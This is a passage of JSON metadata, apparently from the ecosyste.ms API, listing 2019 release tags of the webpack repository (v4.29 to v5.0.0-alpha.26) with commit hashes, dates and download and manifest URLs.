26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.